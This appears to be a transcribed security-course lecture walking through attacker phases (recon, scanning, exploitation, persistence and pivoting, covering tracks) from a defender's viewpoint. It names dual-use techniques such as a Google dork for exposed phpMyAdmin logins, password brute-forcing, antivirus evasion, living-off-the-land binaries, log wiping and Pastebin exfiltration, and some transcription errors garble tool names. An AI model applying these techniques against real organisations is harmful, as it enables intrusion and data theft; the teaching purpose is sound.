In this section, we're going to talk about hacker tactics, techniques, and procedures. These are going to be the phases that an attacker would use when they're attempting to hack into an organization. The reason why it matters is because at each step of the phase, as a defender, there are certain things that you can look for to help you identify what may be going on. At a high level, the attack methodology is broken down into five phases. Now, these phase names may change or there may be more phases. There maybe six phases or they maybe condensed down to four phases, depending on the organization that you're looking at in terms of the training institution or whatever, are these the framework that you're dealing with? But generally speaking, they follow these same basic guidelines. There's recon, information gathering, which are very similar but slightly different enough for our purposes, gaining access, maintaining access and pivoting, and covering tracks. During a recon phase, this is our first step in our attack cycle. We're going to gather as much information as possible about our target. There's generally three types of information or three groups of information that we're concerned about. That is the network, the host, and people involved with our target organization. There are two types of recon that we can generally do. We can do active recon. This is recon where we interact with our target directly. Passive recon. This is the type of recon where we interact with third-party entities that also have information about our target. We're going to split those into two separate categories. When we talk about passive recon, we're talking about if I was to go to Google and google my target, let's say when I attempt to hack into EC-Council. I could throw EC-Council into Google, I could see what information is there about them, and EC-council won't know that I've been doing that. I didn't send any draft to EC-Council. Now, I can probably find phone numbers for where EC-Council is. Now, if I start calling those phone numbers, that's where we cross into active. The idea here is that I directly interacted with the target. The differences being, in the passive area of recon, the defenders can't really do anything to stop that or identify when passive recon is taking place. The reason for this is because I'm not interacting with them directly. There's no blogs that they get. They can attempt to lessen their footprint by reducing the amount of information that's publicly available and making sure that they don't release any thing to the public they don't intend to. It's very common that organizations have issues with maybe their security levels on documentation and sometimes that information will get leaked probably, or they'll have certain types of websites exposed that they should not allow to be exposed. There are a lot of passive tools that we can use. Google is the biggest one. You can use a process called Google Dorking to help you be very specific in your search queries and identify things that you normally wouldn't be able to find. There are other things like Shodan, which is a searchable database like Google, that's for internet connected devices. Shodan has already done the fingerprinting for us to tell us what versions of the device are available, what services are running on it, what the IP space is, things of that nature. Now, in the active category, this is where we start directly interacting with the target. If we're talking about a phone, for an example, we gather the phone number in the passive phase. If we start calling that organization and we move into the active phase, now the organization has a log or a call log, or we've talked to a receptionist and we've asked them questions. Now the organization has something that they've seen that they can start to track down our identity or location, or to help stop in the future. If you call an organization and you get the reception on the phone, and you start asking potentially sensitive questions about their infrastructure, if you ask, how many security guards are in the building, this may raise the security levels of the organization and raise some red flags for them. Same thing for if we start doing any physical touching on their applications or websites. If we start querying them, they'll start seeing logs within their web server logs. What we want to do now is, we're going to jump over to some of these tools and show you how they work on the passive side. We're not really going to do anything active. We talked about Google Dorking, and there is a site called Exploit-DB.com. Exploit DB is a place where people can go and they can contribute their custom built Google Dorks. You can see a lot of them here and when they are added, and there's things added all the time as you can see. The reason why this matters is because as applications are added to the internet or as people identify different combinations of keywords they can put in place, it'll change what you can find. You can see there are 6,000 different Google Dorks added to this database and there are more dorks that you can come up with on your own. What we're going to do is, we're going to click on one of these. We're just going as phpmyadmin/user. We're going to open up in another tab. On the right here, you can see the category, what kind of things it would give you, so the files containing juicy info, the author who contributed it. With an excellent DB, there are various shell codes available, so this is going to be actual payloads that you could drop onto a target system. Papers exploits in terms of, you'll use a payload and exploit right. You would use your expert to get onto the system and maybe you'll use some short code there to drop a payload for posts to exploit means. Exploit DB is a great resource for attackers, but right now we're worried about Google Hacking Database which is GHDB. We right-click on our phpmyadmin/user and we throw it up in next tab. All it does as you can see here, in the Google search bar, it inserts any URL. Just saying, for any URL, look for this string phpmyadmin/user_password.php and you can see that there's a fair amount of them, three pages worth. What these are, these are going to be the phpmyadmin login interfaces for that organization. You see we've got some other organizations up here, and phpmyadmin, if you're able to log into that especially as an authenticated user, there's a fair amount of damage that you can do, information that you can gain, and things that you can change on a target website. If we would have just open up this link here, you can see now that we are at our phpmyadmin login portal. Now, this is as far as we can go. This is open. We haven't done anything as far as attacking this target yet, but we happened to been active because we did visit this site. Now, if they look at their web logs, they will be able to see there was a visitor to this application. If we start guessing passwords, that can be considered an attack and that would be legal for us to do. However, if we were a malicious attacker, that's exactly what we probably start doing. We'd probably do some more open-source recon to look for some more information about this organization and come up with some potential usernames and passwords. We would also guess default credentials or generally run a password [inaudible] against this page in an attempt to login. The other thing I want to show you is Shodan. You go to Shodan.IO. This is database internet connected devices. This is totally a legal website to use. Now, there's a certain point where accessing systems that you don't have explicit permission to access will become illegal, but for now we can look at it. Once you get to Shodan and you go to Explore, you'll see that it's got some categories that you can go to and the big thing here is internet connected webcams and security cameras. Cameras with default credential, you see admin here. If we were to click on one of these webcam ones, it will give us a list of all the webcams. Now, if we start clicking on these, that would be where we run into issues of possibly accessing one of those. You see honeypot, they've got different tags on them, and you can see the location they're at and how many of them. You can see what the services are running,. You can see the organizations, the products, a bunch of information there. You can also just go back to the home here and you can do more broad search. We just clicked on one of the explore built-in queries for us. But if we wanted to go ahead and search, let's say http, this should show us a list of all the http systems connected to the Internet. That's pretty large list. It should be in the millions, I would expect. Shodan is fairly cheap. It has a free version and a paid version. The free version does have some of the things that you can do and limited mass of queries that you can make. The paid version is fairly cheap and even cheaper during some major sales that they do. You can see there's millions and millions of http servers, which we expected. Though what's important to take away here is that, it gives us this footprint. We take this one here, it gives us the internet provider location, the technologies you use on that web server if we were to go there. It will tell us some general header information that we can use. This again, is very valuable information to attacker, but it's also passive. This organization has no idea that now we've seen this information. The next phase, information gathering and scanning. I like to keep this as a separate phase from the first phase because I feel at this point, they'll soon start to read a lot more flags for our defenders. This is where as an attacker, we're starting to get down to the meat and bones. This is also a cyclical process. Here, what we're going to do is, we're going to start scanning and fingerprinting our hosts and their services. There are three types of scans that are generally involved. There's port scanning. This involves scanning the target for information like open ports, live systems, various services running on the host. There's lots of tools that can be used for this. The most common and the one that's used by everybody all the time is IMAP. The next type of scanning that you'll see a lot is vulnerability scanning. This is where once we identify a host using our port scanning, we're going to then run a vulnerability scan on it. Vulnerability scans can check the target for weaknesses that can be exploited and this is usually done with the help of automated tools. Now, in real-world attacks generally speaking, you don't see many vulnerability scanners being run. They're very noisy, they create a lot of alerts that the defender can easily identify, not to mention that the vulnerability scanners are only going to have an unauthenticated access presumably at this point, and generally speaking, there's not too many things that you're going to identify with the vulnerability scanner from an authenticated point of view that you don't identify very easily from the port scanning point of view. When we do our port scanning and we check for ports and services running, if we're using IMAP, we can check for the versions of those ports and services. Once we have that information, we can do some research to identify if those versions have any sort of common publicly known exploits available for them or if there's misconfigurations on the services. Vulnerability scanning, while it's something we would definitely do during penetration test, it's not something that we see very often during a real-world attack. Network Mapping. Again, this is very similar to port scan. This is what we're going to try and map out the network, and this is generally going to be by trying to get a hold of any sort of network configurations, account routers, firewalls, anything that we can do of that nature to get a better lay of the land. Our overall goal in this phase is to identify a potential weak spot that we can leverage for our next phase in the attack cycle, which is our exploitation phase. Generally, that's going to happen with our first two types of scans here; port scanning and vulnerability scanning. Gaining access or exploitation. During this phase, the attackers can attempt to gain a foothold into an organization. If you take a recon where we've got phpmyadmin page and we ran a brute force login tool against it, and it logged in, now we have access, we've now gotten to this phase of our attack cycle. There are a lot of tools and techniques that can be used to accomplish this. The most common exploit framework out there still today, it's one of the oldest. It's definitely the most popular and well-known as Metasploit. It has tons of different exploits built into it and different tools that you can use to help you exploit machines, but there are a lot of other ones that you'll hear about. The thing isn't a defender though, is Metasploit's very well-known and a lot of Metasploit's signatures are heavily identified by all the defender tool sets. Metasploit's common payloads like Meterpreter will immediately trigger any antivirus out there nowadays. At least by stacks version of Meterpreter, you can modify things, you can do some encoding and things like that to try and make it bypass antivirus. All that said, if the attackers are successful at gaining their initial foothold, they will probably have remote access into the system now. This is going to depend on their goal. Generally speaking, if they're trying to get into an organization, they probably have plans to extract data or pivot to further goals, whether it's to steal money, to do damage, or extract data. This point, they probably have remote access into a system and they're going to leverage that excess for the next phase of the attack cycle. Maintaining access and pivoting. As I just mentioned, our goal during this stage depends on what we are trying to accomplish. If we're just trying to get in just to prove that we can get in, then we've done that and we are successful. If now we want to try and pivot around to get to a more sensitive part of our organization, we can start doing that. If our goal is to steal information, we can start looking for the information. If our goal is to cause damage, this is where we will start to do that. If our goal is to elevate our privileges to do further operations, that's also where we start do that. Depending on what our goal is, it's going to depend on the types of tools we use, it's going to affect our techniques that we use going forward, and it's going to alter some of those defender flags that they are going to identify. If we're trying to elevate privileges to an administrator or domain administrator, we might initially start looking at accounts on the system that we're in, we might start trying to sniff network traffic or running other tools like responder if we can drop them onto the host, we might start installing tools to help us gain privileges, which is very common and a big indicator for network defender. If a host on your network all of a sudden starts installing known hacking tools like responder, that is something that's going to be an attention grabber for you. If our goal is to pivot to another machine or just to start recounting towards a more sensitive area of the network, we're going to start running those scans again from the previous phase. We're going to start running IMAP again if we can, or running quick power shop port scanners or bashed port scanners or whatever we have in place, or whatever on the system. Depending on the sophistication of the attacker, they may not do something like install in there because it is a flag for a defender. They may do what we call live off the land, and I'll show you what that looks like here in a second. Once they run their network scans or whatever, if our goal was to move throughout the network, we're then going to find our next target and we have to again attack it. Now, things maybe a little bit easier for us now because hopefully we have credentials. Maybe we attempted to hash and cracked it, maybe we've gotten a ticket and we're going to replay our ticket, maybe we're just going to pass the hash to our target. But hopefully, we can identify the next target on our network we want to pivot to and jump from our current host to the second host in our train of attack. Then we're going to attempt to install persistence mechanism. Once we elevate privileges, once we pivot through the network or just to ensure that we are safe where we're at, to make sure that if someone restarts their computer in the middle of our foothold, that we don't lose all of our access and have to start over or start installing persistence mechanisms. Lot of times, it's going to look like a binary that's going to startup when the machine restarts. That's a pretty common one. Let me show you the LOLBAS project here. This here is LOLBAS or living-off-the-land binaries and scripts, and this is the newer approach to post exploitation that a lot of attackers are using. The reason why is because a lot of attack tool sets are easily identifiable. Once an attacker hits a tool, if Windows Defender or Microsoft gets a hold of that tool, they're going to start highlighting signatures and they're going to put those signatures into their antivirus engine. Then when that tool is used, the antivirus engine is going to detect it and the attacker is going to be caught. With living-off-the-land binaries and scripts, these are tools that are on your system by default and generally won't notify any defenders of their use, and they have interesting functions that can be exploited and used by an attacker to do certain things. We can see here extra details. We can use certutils command if we are on a Windows machine to download additional payloads off of the internet from somewhere. There's all sorts of things that we can do. We can write alternate data streams , application whitelist bypassing. If you want to attempt to run applications that the user shouldn't be allowed to use because of user permission levels, we can attempt to do that by using some of these commands. Let's look at what that might look like. The application whitelist bypass runs if we just run the DL32 and we give it all these flags, and we give the location of where we want to run to. You can see the privileges required is just a regular user. We don't need to be an admin at this point. We can see the systems that it works on by default. Now, at this point if you were to run this, it will possibly be caught by defenses because you'll see this thing here is MITRE and it gives you a number. We'll talk about this in a little bit, but that's for the MITRE attack framework and this maps on MITRE attack technique. Let me look at that and see what it says real quick. Trusted developer utilities proxy execution. We'll go over all this in a few minutes, but this is what a lot of defenders now are going to map their detection capabilities off of to help them identify what's going on when they see some of these flags. Something in the back here. There are quite a few of these LOLBAS tools that we can use and this is just on Windows. You can see here, if we want to go look at GTFO binaries, we have another site GTFOBins, and all of the things that GTFOBins can do. You can see with awk, A-W-K, there are lots of things that we can use it for to help us elevate our privileges as an attacker. Our final phase, we talked about covering our tracks. If we're an attacker, we did a recon, and our information gathering, we scanned the target exposed surface to find a potential place that we can attack. We exploited that surface or our hole that we found, our weak spot. We explained that we expect to get a foothold in our network. Once we're in our network, we built in a persistence mechanism in case we got kicked off our network. We also started to elevate our privileges trying to get to admin or domain admin and we wanted to pivot around the network to get the information that we wanted to do, looking for certain files or sensitive information. Now, we're done. We want to start leaving and we want to cover our tracks. The goal here is to not get caught and remove any evidence that we've ever been here. Some of the ways that we start to do that is, you remove your logs. You delete malware or any installed binaries that we did as an attacker. We're going to use drop sites for any of our data dump. If we stole data, instead of bringing that data straight back to our systems, we might dump it to somewhere like paste bin because paste bin then will act as a proxy for us that we can go get it from without being so easily tracked back to our home networks if that makes sense. The problem with these and the problem of covering our tracks, it's very difficult to do. If we start removing logs in an attacker, the removal of those logs will get logged and it will create a weird lip possibly, when someone looks at logs. If we say we removed all the network logs from the five minutes that we were scanning the network, well as the defender and you see a sudden loss of five minutes in your network logs, that's going to be a flag. If we see that there are instances where applications are getting deleted, that's going to be a flag of what was deleted. Some unknown binary was deleted, what was it and why. Who deleted it? When? All the log, if being deleted, it's gone or the log what was installed is gone, or whatever, it becomes difficult and the attempt to covering your tracks will in a way create more tracks. We don't do this during a pen test typically or writing assessment. But during a real-world attacker, this is absolutely a technique that is used because it's so hard to cover our tracks. We can just attempt to impersonate another organization. The reason why this works is because direct attribution is very difficult. Because I as an attacker don't physically have to come to your building to break in, I can do it over the Internet, I can use proxies, I can use VPN services, I can use all sorts of other tools. I can use Cloud services, they hide who I really am. It's very hard to follow that trail all the way back to a specific attacker. There's Tor networks and things like that that help mask the attack locations. What you'll see a lot of is, organizations, if they don't want to take credit for it, they may start putting identifiers and fingerprints in place that look like other organizations. If Russia was going to attack some organization or APT32 is going to attack an organization, they may want to put fingerprints in place that make it look like a different APT was there or America was here or China was here. That way, it throws the defenders off the sense a little bit. This is something that's done quite a bit, not because again, attribution is hard, it's hard to identify when it's being used, but it definitely doesn't use especially the nation-state level and APT level. Next up, we're going to talk about the MITRE attack framework in the next video. We're going to talk about how all these phases come together for the defender, what kind of detection flags you're looking for, and how to use MITRE attack framework to map to what's going on in your network.
